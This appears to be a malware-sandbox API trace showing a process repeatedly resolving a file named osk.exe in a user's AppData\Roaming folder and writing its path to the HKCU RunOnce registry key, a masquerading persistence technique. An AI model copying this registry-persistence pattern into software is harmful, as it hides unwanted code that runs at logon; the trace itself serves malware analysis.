[0077.445] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), 
pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.445] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.445] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.445] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.445] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.445] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.445] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.445] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7 [0077.445] FileSystemObject:IDispatch:GetIDsOfNames (in: 
This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.445] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x8 [0077.445] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.446] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x7 [0077.446] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.446] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.446] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.446] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.447] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.447] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) 
returned 61 [0077.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.447] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.447] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.447] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.447] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.447] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.447] RegCloseKey (hKey=0x280) returned 0x0 [0077.447] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.447] GetCurrentThreadId () returned 0x544 [0077.447] GetCurrentThreadId () returned 0x544 [0077.448] 
ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.448] SetTimer (hWnd=0x20280, nIDEvent=0x2007, uElapse=0xa, lpTimerFunc=0x0) returned 0x2007 [0077.448] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.459] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.459] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.460] KillTimer (hWnd=0x20280, uIDEvent=0x2007) returned 1 [0077.460] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.460] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.460] IUnknown:Release (This=0x787518) returned 0x1 [0077.460] GetTickCount () returned 0x11499b1 [0077.460] GetCurrentThreadId () returned 0x544 [0077.460] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.460] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.460] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, 
cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.461] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.461] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.461] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.461] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.461] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.461] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.461] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x8 [0077.461] 
FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.461] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x9 [0077.461] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.462] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x8 [0077.462] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.462] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.462] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.462] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.462] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.462] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0077.462] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.462] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.462] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.463] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.463] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.463] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.463] RegCloseKey (hKey=0x280) returned 0x0 [0077.463] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.463] GetCurrentThreadId () returned 0x544 [0077.463] 
GetCurrentThreadId () returned 0x544 [0077.463] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.463] SetTimer (hWnd=0x20280, nIDEvent=0x2008, uElapse=0xa, lpTimerFunc=0x0) returned 0x2008 [0077.463] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0077.475] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0077.475] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0077.476] KillTimer (hWnd=0x20280, uIDEvent=0x2008) returned 1 [0077.476] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0077.476] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0077.476] IUnknown:Release (This=0x787518) returned 0x1 [0077.476] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0077.476] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0077.476] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, 
wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0077.477] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0077.477] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0077.477] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0077.477] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0077.477] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0077.477] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0077.477] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x9 [0077.477] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, 
riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0077.477] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0xa [0077.477] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0077.478] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x9 [0077.478] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.478] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0077.478] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.478] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0077.478] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.478] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0077.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 
[0077.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0077.478] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0077.478] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0077.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0077.478] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0077.479] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0077.479] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0077.479] RegCloseKey (hKey=0x280) returned 0x0 [0077.479] IUnknown:Release (This=0x7a9740) returned 0x1 [0077.479] GetCurrentThreadId () returned 0x544 [0077.479] GetCurrentThreadId () returned 0x544 [0077.479] 
